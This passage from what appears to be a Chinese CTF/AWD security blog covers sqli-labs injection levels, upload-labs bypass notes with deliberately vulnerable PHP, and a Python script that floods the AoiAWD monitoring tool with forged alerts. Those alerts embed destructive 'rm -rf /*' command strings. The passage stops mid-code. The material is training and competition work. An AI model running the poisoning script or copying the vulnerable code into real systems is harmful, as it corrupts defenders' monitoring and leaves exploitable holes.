<h2 id="order-by注入"><a href="#order-by注入" class="headerlink" title="order by注入"></a><code>order by注入</code></h2><figure class="highlight sql"><table><tr><td class="code"><pre><span class="line"><span class="keyword">SELECT</span> <span class="operator">*</span> <span class="keyword">FROM</span> users <span class="keyword">ORDER</span> <span class="keyword">BY</span></span><br></pre></td></tr></table></figure>

<p>order by 与 where 差不多<br>但不同是 order by 不能使用 union 联合<br>其他都可 也比较灵活<br>从 46 到 53 关皆为 order by 注入</p>
<h2 id="限制次数的注入"><a href="#限制次数的注入" class="headerlink" title="限制次数的注入"></a>限制次数的注入</h2><p>从 54 关开始，限制了注入次数<br>一旦超过次数就会改变数据<br>一切又要重新开始<br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254167926-107.png" alt="在这里插入图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254169537-110.png" alt="在这里插入图片描述"><br><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254171849-113.png" alt="在这里插入图片描述"></p>
<p><img src= "/img/watermark,type_d3F5LXplbmhlaQ,shadow_50,text_Q1NETiBAQ07lpKnni7w=,size_20,color_FFFFFF,t_70,g_se,x_16#pic_center-1689254174456-116.png" alt="在这里插入图片描述">58-62 可以报错注入<br>从 62 关开始只能使用盲注<br><code>id注入部分代码</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="meta">&lt;?php</span></span><br><span class="line">id注入部分代码</span><br><span class="line"><span class="comment">//including the Mysql connect parameters.</span></span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;../sql-connections/sql-connect-1.php&#x27;</span>;</span><br><span class="line"><span class="keyword">include</span> <span class="string">&#x27;../sql-connections/functions.php&#x27;</span>;</span><br><span class="line"><span class="title function_ invoke__">error_reporting</span>(<span class="number">0</span>);</span><br><span class="line"><span class="variable">$pag</span> = <span class="variable">$_SERVER</span>[<span class="string">&#x27;PHP_SELF&#x27;</span>]; /generating page address to piggy back after redirects...</span><br><span class="line"><span class="variable">$characters</span> = <span class="string">&#x27;ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789&#x27;</span>; /characterset <span class="keyword">for</span> generating random data</span><br><span class="line"><span class="variable">$times</span>= <span class="number">10</span>;</span><br><span class="line"><span class="variable">$table</span> = <span class="title function_ invoke__">table_name</span>();</span><br><span class="line"><span class="variable">$col</span> = <span class="title function_ invoke__">column_name</span>(<span class="number">1</span>);     / session id column name</span><br><span class="line"><span class="variable">$col1</span> = <span class="title function_ invoke__">column_name</span>(<span class="number">2</span>);   /secret key column name</span><br><span class="line">/ Submitting the <span class="keyword">final</span> answer</span><br><span class="line"><span class="keyword">if</span>(!<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;answer_key&#x27;</span>]))&#123;</span><br><span class="line">	/ resetting the challenge <span class="keyword">and</span> repopulating the table .</span><br><span class="line">	<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;reset&#x27;</span>]))&#123;</span><br><span class="line">		<span class="title function_ invoke__">setcookie</span>(<span class="string">&#x27;challenge&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="title function_ invoke__">time</span>() - <span class="number">3600000</span>);</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;font size=4&gt;You have reset the Challenge&lt;/font&gt;&lt;br&gt;\n&quot;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;Redirecting you to main challenge page..........\n&quot;</span>;</span><br><span class="line">		<span class="title function_ invoke__">header</span>( <span class="string">&quot;refresh:4;url=../sql-connections/setup-db-challenge.php?id=<span class="subst">$pag</span>&quot;</span> );</span><br><span class="line">		<span class="comment">//echo &quot;cookie expired&quot;;</span></span><br><span class="line"></span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span>&#123;</span><br><span class="line">		/ Checking the cookie on the page <span class="keyword">and</span> populate the table with random value.</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_COOKIE</span>[<span class="string">&#x27;challenge&#x27;</span>]))&#123;</span><br><span class="line">			<span class="variable">$sessid</span>=<span class="variable">$_COOKIE</span>[<span class="string">&#x27;challenge&#x27;</span>];</span><br><span class="line">			<span class="comment">//echo &quot;Cookie value: &quot;.$sessid;</span></span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="variable">$expire</span> = <span class="title function_ invoke__">time</span>()+<span class="number">60</span>*<span class="number">60</span>*<span class="number">24</span>*<span class="number">30</span>;</span><br><span class="line">			<span class="variable">$hash</span> = <span class="title function_ invoke__">data</span>(<span class="variable">$table</span>,<span class="variable">$col</span>);</span><br><span class="line">			<span class="title function_ invoke__">setcookie</span>(<span class="string">&quot;challenge&quot;</span>, <span class="variable">$hash</span>, <span class="variable">$expire</span>);</span><br><span class="line"></span><br><span class="line">		&#125;</span><br><span class="line"></span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;\n&quot;</span>;</span><br><span class="line">		/take the variables</span><br><span class="line">		<span class="keyword">if</span>(<span class="keyword">isset</span>(<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>]))&#123;</span><br><span class="line">			<span class="variable">$id</span>=<span class="variable">$_GET</span>[<span class="string">&#x27;id&#x27;</span>];</span><br><span class="line">			/logging the connection parameters to a file <span class="keyword">for</span> analysis.</span><br><span class="line">			<span class="variable">$fp</span>=<span class="title function_ invoke__">fopen</span>(<span class="string">&#x27;result.txt&#x27;</span>,<span class="string">&#x27;a&#x27;</span>);</span><br><span class="line">			<span class="title function_ invoke__">fwrite</span>(<span class="variable">$fp</span>,<span class="string">&#x27;ID:&#x27;</span>.<span class="variable">$id</span>.<span class="string">&quot;\n&quot;</span>);</span><br><span class="line">			<span class="title function_ invoke__">fclose</span>(<span class="variable">$fp</span>);</span><br><span class="line">			/update the counter in database</span><br><span class="line">			<span class="title function_ invoke__">next_tryy</span>();</span><br><span class="line">			/Display attempts on screen.</span><br><span class="line">			<span class="variable">$tryyy</span> = <span class="title function_ invoke__">view_attempts</span>();</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;You have made : &quot;</span>. <span class="variable">$tryyy</span> .<span class="string">&quot; of <span class="subst">$times</span> attempts&quot;</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&lt;br&gt;&lt;br&gt;\n&quot;</span>;</span><br><span class="line">		  /Reset the Database <span class="keyword">if</span> you exceed allowed attempts.</span><br><span class="line">			<span class="keyword">if</span>(<span class="variable">$tryyy</span> &gt;= (<span class="variable">$times</span>+<span class="number">1</span>))&#123;</span><br><span class="line">				<span class="title function_ invoke__">setcookie</span>(<span class="string">&#x27;challenge&#x27;</span>, <span class="string">&#x27; &#x27;</span>, <span class="title function_ invoke__">time</span>() - <span class="number">3600000</span>);</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;&lt;font size=4&gt;You have exceeded maximum allowed attempts, Hence Challenge Has Been Reset &lt;/font&gt;&lt;br&gt;\n&quot;</span>;</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;Redirecting you to challenge page..........\n&quot;</span>;</span><br><span class="line">				<span class="title function_ invoke__">header</span>( <span class="string">&quot;refresh:3;url=../sql-connections/setup-db-challenge.php?id=<span class="subst">$pag</span>&quot;</span> );</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;\n&quot;</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		/ Querry DB to get the correct output</span><br><span class="line">			<span class="variable">$sql</span>=<span class="string">&quot;SELECT * FROM security.users WHERE id=&#x27;<span class="subst">$id</span>&#x27; LIMIT 0,1&quot;</span>;</span><br><span class="line">			<span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>);</span><br><span class="line">			<span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>);</span><br><span class="line">			<span class="keyword">if</span>(<span class="variable">$row</span>)&#123;</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#00FFFF&quot;&gt;&#x27;</span>;</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&#x27;Your Login name:&#x27;</span>. <span class="variable">$row</span>[<span class="string">&#x27;username&#x27;</span>];</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;&lt;br&gt;&quot;</span>;</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&#x27;Your Password:&#x27;</span> .<span class="variable">$row</span>[<span class="string">&#x27;password&#x27;</span>];</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">			&#125;</span><br><span class="line">			<span class="keyword">else</span> &#123;</span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line"><span class="comment">//				print_r(mysql_error());</span></span><br><span class="line">				<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">			&#125;</span><br><span class="line">		&#125;</span><br><span class="line">		<span class="keyword">else</span>&#123;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;Please input the ID as parameter with numeric value as done in  Lab excercises\n&lt;br&gt;&lt;br&gt;\n&lt;/font&gt;&quot;</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;&lt;font color=&#x27;#00FFFF&#x27;: size=3&gt;The objective of this challenge is to dump the &lt;b&gt;(secret key)&lt;/b&gt; from only random table from Database &lt;b&gt;&lt;i&gt;(&#x27;CHALLENGES&#x27;)&lt;/i&gt;&lt;/b&gt; in Less than <span class="subst">$times</span> attempts&lt;br&gt;&quot;</span>;</span><br><span class="line">			<span class="keyword">echo</span> <span class="string">&quot;For fun, with every reset, the challenge spawns random table name, column name, table data. Keeping it fresh at all times.&lt;br&gt;&quot;</span> ;</span><br><span class="line">		&#125;</span><br><span class="line">	&#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p><code>答案提交部分</code></p>
<figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="keyword">else</span></span><br><span class="line">&#123;</span><br><span class="line">	<span class="keyword">echo</span> <span class="string">&#x27;&lt;div  style=&quot; color:#00FFFF; font-size:18px; text-align:center&quot;&gt;&#x27;</span>;</span><br><span class="line">	<span class="variable">$key</span> = <span class="title function_ invoke__">addslashes</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;key&#x27;</span>]);</span><br><span class="line">	<span class="variable">$key</span> = <span class="title function_ invoke__">mysql_real_escape_string</span>(<span class="variable">$key</span>);</span><br><span class="line">	<span class="comment">//echo $key;</span></span><br><span class="line">	/Query table to verify your result</span><br><span class="line">	<span class="variable">$sql</span>=<span class="string">&quot;SELECT 1 FROM <span class="subst">$table</span> WHERE <span class="subst">$col1</span>= &#x27;<span class="subst">$key</span>&#x27;&quot;</span>;</span><br><span class="line">	<span class="comment">//echo &quot;$sql&quot;;</span></span><br><span class="line">	<span class="variable">$result</span>=<span class="title function_ invoke__">mysql_query</span>(<span class="variable">$sql</span>)<span class="keyword">or</span> <span class="keyword">die</span>(<span class="string">&quot;error in submittion of Key Solution&quot;</span>.<span class="title function_ invoke__">mysql_error</span>());</span><br><span class="line">	<span class="variable">$row</span> = <span class="title function_ invoke__">mysql_fetch_array</span>(<span class="variable">$result</span>);</span><br><span class="line">	<span class="keyword">if</span>(<span class="variable">$row</span>)</span><br><span class="line">	&#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;\n&lt;br&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/Less-54-1.jpg&quot; /&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">		<span class="title function_ invoke__">header</span>( <span class="string">&quot;refresh:4;url=../sql-connections/setup-db-challenge.php?id=<span class="subst">$pag</span>&quot;</span> );</span><br><span class="line">	&#125;</span><br><span class="line">	<span class="keyword">else</span> &#123;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;font color= &quot;#FFFF00&quot;&gt;&#x27;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;\n&lt;br&gt;&lt;br&gt;&lt;br&gt;&quot;</span>;</span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&#x27;&lt;img src=&quot;../images/slap1.jpg&quot; /&gt;&#x27;</span>;</span><br><span class="line">		<span class="title function_ invoke__">header</span>( <span class="string">&quot;refresh:3;url=index.php&quot;</span> );</span><br><span class="line">		<span class="comment">//print_r(mysql_error());</span></span><br><span class="line">		<span class="keyword">echo</span> <span class="string">&quot;&lt;/font&gt;&quot;</span>;</span><br><span class="line">		&#125;</span><br><span class="line">&#125;</span><br><span class="line"><span class="meta">?&gt;</span></span><br></pre></td></tr></table></figure>
]]></content>
      <categories>
        <category>web</category>
      </categories>
      <tags>
        <tag>web</tag>
        <tag>sql</tag>
        <tag>sqli-lab</tag>
      </tags>
  </entry>
  <entry>
    <title>AoiAWD反制脚本</title>
    <url>/2024/05/untiAoi/</url>
    <content><![CDATA[<h2 id="AoiAWD-反制脚本"><a href="#AoiAWD-反制脚本" class="headerlink" title="AoiAWD 反制脚本"></a>AoiAWD 反制脚本</h2><h3 id="起因"><a href="#起因" class="headerlink" title="起因"></a>起因</h3><p>在经历过 awd 比赛中 AoiAWD 多次崩溃后(长城杯 虽然最后还是进决赛摸鱼了)</p>
<p>赛后研究了一下</p>
<p>开发了这个反制脚本</p>
<p>由于打点队友喜欢用 gogo</p>
<p>所以这个脚本支持 gogo 扫描结果</p>
<h3 id="思路"><a href="#思路" class="headerlink" title="思路"></a>思路</h3><p>发现后端未验证来自靶机的数据</p>
<p>因此存在脏数据污染</p>
<p>针对此开发脚本</p>
<p>可向 AoiAWD 的各个数据展示页面投放脏数据</p>
<p>包括告警页面</p>
<h3 id="脚本"><a href="#脚本" class="headerlink" title="脚本"></a>脚本</h3><p>再此公布本脚本，希望下次 awd 遇见的时候别打我，谢谢 QAQ</p>
<figure class="highlight python"><table><tr><td class="code"><pre><span class="line"><span class="keyword">import</span> re</span><br><span class="line"><span class="keyword">import</span> socket</span><br><span class="line"></span><br><span class="line">f = <span class="built_in">open</span>(<span class="string">&quot;./ip.txt&quot;</span>, <span class="string">&quot;r+&quot;</span>)</span><br><span class="line">url_list = f.readlines()</span><br><span class="line"></span><br><span class="line"><span class="keyword">for</span> i <span class="keyword">in</span> url_list:</span><br><span class="line">    pattern = <span class="string">r&quot;tcp://(\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;\.\d&#123;1,3&#125;:\d+)&quot;</span></span><br><span class="line">    <span class="keyword">match</span> = re.search(pattern, i, <span class="number">0</span>)</span><br><span class="line">    <span class="keyword">if</span> <span class="keyword">match</span>:</span><br><span class="line">        i = <span class="keyword">match</span>.group(<span class="number">0</span>).split(<span class="string">&quot;//&quot;</span>)[<span class="number">1</span>]</span><br><span class="line">        p = <span class="built_in">int</span>(i.split(<span class="string">&quot;:&quot;</span>)[<span class="number">1</span>])</span><br><span class="line">        i = i.split(<span class="string">&quot;:&quot;</span>)[<span class="number">0</span>]</span><br><span class="line">        server_address = (i, p)  <span class="comment"># 替换SERVER_IP和SERVER_PORT为实际值</span></span><br><span class="line">        data = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;ping&quot;&#125;\n&#x27;</span></span><br><span class="line">        data2 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;new_process&quot;,&quot;data&quot;:&#123;&quot;pid&quot;:&quot;114514&quot;,&quot;ppid&quot;:&quot;114514&quot;,&quot;uid&quot;:&quot;0&quot;,&quot;username&quot;:&quot;root&quot;,&quot;cmd&quot;:&quot;rm -rf /*&quot;,&quot;param&quot;:&quot;su root rm -rf /*&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        data3 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;file&quot;,&quot;data&quot;:&#123;&quot;path&quot;:&quot;/update/score_points&quot;,&quot;mode&quot;:33188,&quot;event&quot;:256,&quot;size&quot;:114514,&quot;content&quot;:&quot;ZmxhZ3tDcmF6eV9UaHVydGhkYXlfdl9tZV81MH0=&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        data4 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;web&quot;,&quot;data&quot;:&#123;&quot;scipt&quot;:&quot;/var/www/html/rce.php&quot;,&quot;method&quot;:&quot;post&quot;,&quot;uri&quot;:&quot;127.0.0.1/rce.php&quot;,&quot;remote&quot;:&quot;127.0.0.1&quot;,&quot;buffer&quot;:&quot;&#123;\\&quot;flag\\&quot;:\\&quot;flag&#123;Crazy_Thurthday_v_me_50&#125;\\&quot;&#125;&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        data5 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;pwn&quot;,&quot;data&quot;:&#123;&quot;file&quot;:&quot;catflag&quot;,&quot;type&quot;:&quot;stdin&quot;,&quot;pid&quot;:&quot;123&quot;,&quot;maps&quot;:&quot;su root rm -rf /*&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        data6 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;pwn&quot;,&quot;data&quot;:&#123;&quot;file&quot;:&quot;catflag&quot;,&quot;type&quot;:&quot;stdin&quot;,&quot;pid&quot;:&quot;123&quot;,&quot;maps&quot;:&quot;su root rm -rf /*&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        data7 = <span class="string">&#x27;&#123;&quot;type&quot;:&quot;file&quot;,&quot;data&quot;:&#123;&quot;path&quot;:&quot;/114514&quot;,&quot;mode&quot;:33188,&quot;event&quot;:256,&quot;size&quot;:114514,&quot;content&quot;:&quot;c3Ugcm9vdCBybSAtcmYgLyo=&quot;&#125;&#125;\n&#x27;</span></span><br><span class="line">        <span class="keyword">with</span> socket.socket(socket.AF_INET, socket.SOCK_STREAM) <span class="keyword">as</span> sock:</span><br><span class="line">            <span class="keyword">try</span>:</span><br><span class="line">                sock.settimeout(<span class="number">1</span>)</span><br><span class="line">                sock.connect(server_address)</span><br><span class="line">                sock.sendall(data.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                tmp = sock.recvfrom(<span class="number">1024</span>)</span><br><span class="line">                <span class="keyword">if</span> <span class="string">&quot;pong&quot;</span> <span class="keyword">in</span> <span class="built_in">str</span>(tmp):</span><br><span class="line">                    sock.sendall(data2.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    sock.sendall(data3.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    sock.sendall(data4.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    <span class="keyword">for</span> j <span class="keyword">in</span> <span class="built_in">range</span>(<span class="number">60</span>):</span><br><span class="line">                        sock.sendall(data7.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    sock.sendall(data6.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    sock.sendall(data5.encode(<span class="string">&quot;utf-8&quot;</span>))</span><br><span class="line">                    <span class="built_in">print</span>(<span class="string">f&quot;[+] <span class="subst">&#123;i&#125;</span>\n&quot;</span>)</span><br><span class="line">                    sock.close()</span><br><span class="line">                <span class="keyword">else</span>:</span><br><span class="line">                    <span class="built_in">print</span>(</span><br><span class="line">                        <span class="string">f&quot;\n[-] --------------------------------<span class="subst">&#123;i&#125;</span>-------------------------------------\n&quot;</span></span><br><span class="line">                    )</span><br><span class="line">            <span class="keyword">except</span> Exception <span class="keyword">as</span> e:</span><br><span class="line">                <span class="built_in">print</span>(<span class="string">f&quot;An error occurred: <span class="subst">&#123;e&#125;</span>&quot;</span>)</span><br></pre></td></tr></table></figure>

<h3 id="Next"><a href="#Next" class="headerlink" title="Next"></a>Next</h3><p>由于分析了各个 AWD 防御工具(Aoi、wathbird 等)</p>
<p>决定模仿 aoi、并借鉴其他各个工具</p>
<p>重写一个基于 go(gin 或 iris 大概率会用 gin)的 AWD 监测防御系统</p>
<p>但是目前没有时间开发(<del>别问，问就是鸽</del>)</p>
<p><del>预计会在 2025 年 5 月问世</del> ：)</p>
<p>如果师傅们有留存的各个 AWD 比赛的流量等数据</p>
<p>以及分析了解过官方 check 机制的师傅</p>
<p>以及有大量参加 AWD 经验的大师傅</p>
<p>欢迎联系本菜鸡</p>
]]></content>
      <categories>
        <category>awd</category>
      </categories>
      <tags>
        <tag>awd</tag>
        <tag>AoiAWD</tag>
        <tag>反制脚本</tag>
      </tags>
  </entry>
  <entry>
    <title>upload-labs</title>
    <url>/2023/07/upload-labs/</url>
    <content><![CDATA[<h2 id="pass-01"><a href="#pass-01" class="headerlink" title="pass-01"></a>pass-01</h2><p>前端 js 过滤</p>
<figure class="highlight javascript"><table><tr><td class="code"><pre><span class="line"><span class="keyword">function</span> <span class="title function_">checkFile</span>(<span class="params"></span>) &#123;</span><br><span class="line">  <span class="keyword">var</span> file = <span class="variable language_">document</span>.<span class="title function_">getElementsByName</span>(<span class="string">&quot;upload_file&quot;</span>)[<span class="number">0</span>].<span class="property">value</span>;</span><br><span class="line">  <span class="keyword">if</span> (file == <span class="literal">null</span> || file == <span class="string">&quot;&quot;</span>) &#123;</span><br><span class="line">    <span class="title function_">alert</span>(<span class="string">&quot;请选择要上传的文件!&quot;</span>);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">  <span class="comment">//定义允许上传的文件类型</span></span><br><span class="line">  <span class="keyword">var</span> allow_ext = <span class="string">&quot;.jpg|.png|.gif&quot;</span>;</span><br><span class="line">  <span class="comment">//提取上传文件的类型</span></span><br><span class="line">  <span class="keyword">var</span> ext_name = file.<span class="title function_">substring</span>(file.<span class="title function_">lastIndexOf</span>(<span class="string">&quot;.&quot;</span>));</span><br><span class="line">  <span class="comment">//判断上传文件类型是否允许上传</span></span><br><span class="line">  <span class="keyword">if</span> (allow_ext.<span class="title function_">indexOf</span>(ext_name + <span class="string">&quot;|&quot;</span>) == -<span class="number">1</span>) &#123;</span><br><span class="line">    <span class="keyword">var</span> errMsg =</span><br><span class="line">      <span class="string">&quot;该文件不允许上传，请上传&quot;</span> +</span><br><span class="line">      allow_ext +</span><br><span class="line">      <span class="string">&quot;类型的文件,当前文件类型为：&quot;</span> +</span><br><span class="line">      ext_name;</span><br><span class="line">    <span class="title function_">alert</span>(errMsg);</span><br><span class="line">    <span class="keyword">return</span> <span class="literal">false</span>;</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>最简单的</p>
<p>burp 抓包改后缀</p>
<h2 id="pass-02"><a href="#pass-02" class="headerlink" title="pass-02"></a>pass-02</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="keyword">if</span> ((<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/jpeg&#x27;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/png&#x27;</span>) || (<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;type&#x27;</span>] == <span class="string">&#x27;image/gif&#x27;</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH . <span class="string">&#x27;/&#x27;</span> . <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>, <span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;文件类型不正确，请重新上传！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH.<span class="string">&#x27;文件夹不存在,请手工创建！&#x27;</span>;</span><br><span class="line">    &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>用 if 函数结合<code>$_FILES[&#39;myfile&#39;][&#39;type&#39;]</code>判断 MIME 类型</p>
<p>后端改 content-type</p>
<p>将<code>application/octect-stream</code>变为<code>image/jpeg、image/png或image/gif</code></p>
<h2 id="pass-03"><a href="#pass-03" class="headerlink" title="pass-03"></a>pass-03</h2><figure class="highlight php"><table><tr><td class="code"><pre><span class="line"><span class="variable">$is_upload</span> = <span class="literal">false</span>;</span><br><span class="line"><span class="variable">$msg</span> = <span class="literal">null</span>;</span><br><span class="line"><span class="keyword">if</span> (<span class="keyword">isset</span>(<span class="variable">$_POST</span>[<span class="string">&#x27;submit&#x27;</span>])) &#123;</span><br><span class="line">    <span class="keyword">if</span> (<span class="title function_ invoke__">file_exists</span>(UPLOAD_PATH)) &#123;</span><br><span class="line">        <span class="variable">$deny_ext</span> = <span class="keyword">array</span>(<span class="string">&#x27;.asp&#x27;</span>,<span class="string">&#x27;.aspx&#x27;</span>,<span class="string">&#x27;.php&#x27;</span>,<span class="string">&#x27;.jsp&#x27;</span>);</span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;name&#x27;</span>]);</span><br><span class="line">        <span class="variable">$file_name</span> = <span class="title function_ invoke__">deldot</span>(<span class="variable">$file_name</span>);<span class="comment">//删除文件名末尾的点</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strrchr</span>(<span class="variable">$file_name</span>, <span class="string">&#x27;.&#x27;</span>);</span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">strtolower</span>(<span class="variable">$file_ext</span>); <span class="comment">//转换为小写</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">str_ireplace</span>(<span class="string">&#x27;::$DATA&#x27;</span>, <span class="string">&#x27;&#x27;</span>, <span class="variable">$file_ext</span>);<span class="comment">//去除字符串::$DATA</span></span><br><span class="line">        <span class="variable">$file_ext</span> = <span class="title function_ invoke__">trim</span>(<span class="variable">$file_ext</span>); <span class="comment">//收尾去空</span></span><br><span class="line"></span><br><span class="line">        <span class="keyword">if</span>(!<span class="title function_ invoke__">in_array</span>(<span class="variable">$file_ext</span>, <span class="variable">$deny_ext</span>)) &#123;</span><br><span class="line">            <span class="variable">$temp_file</span> = <span class="variable">$_FILES</span>[<span class="string">&#x27;upload_file&#x27;</span>][<span class="string">&#x27;tmp_name&#x27;</span>];</span><br><span class="line">            <span class="variable">$img_path</span> = UPLOAD_PATH.<span class="string">&#x27;/&#x27;</span>.<span class="title function_ invoke__">date</span>(<span class="string">&quot;YmdHis&quot;</span>).<span class="title function_ invoke__">rand</span>(<span class="number">1000</span>,<span class="number">9999</span>).<span class="variable">$file_ext</span>;</span><br><span class="line">            <span class="keyword">if</span> (<span class="title function_ invoke__">move_uploaded_file</span>(<span class="variable">$temp_file</span>,<span class="variable">$img_path</span>)) &#123;</span><br><span class="line">                 <span class="variable">$is_upload</span> = <span class="literal">true</span>;</span><br><span class="line">            &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">                <span class="variable">$msg</span> = <span class="string">&#x27;上传出错！&#x27;</span>;</span><br><span class="line">            &#125;</span><br><span class="line">        &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">            <span class="variable">$msg</span> = <span class="string">&#x27;不允许上传.asp,.aspx,.php,.jsp后缀文件！&#x27;</span>;</span><br><span class="line">        &#125;</span><br><span class="line">    &#125; <span class="keyword">else</span> &#123;</span><br><span class="line">        <span class="variable">$msg</span> = UPLOAD_PATH . <span 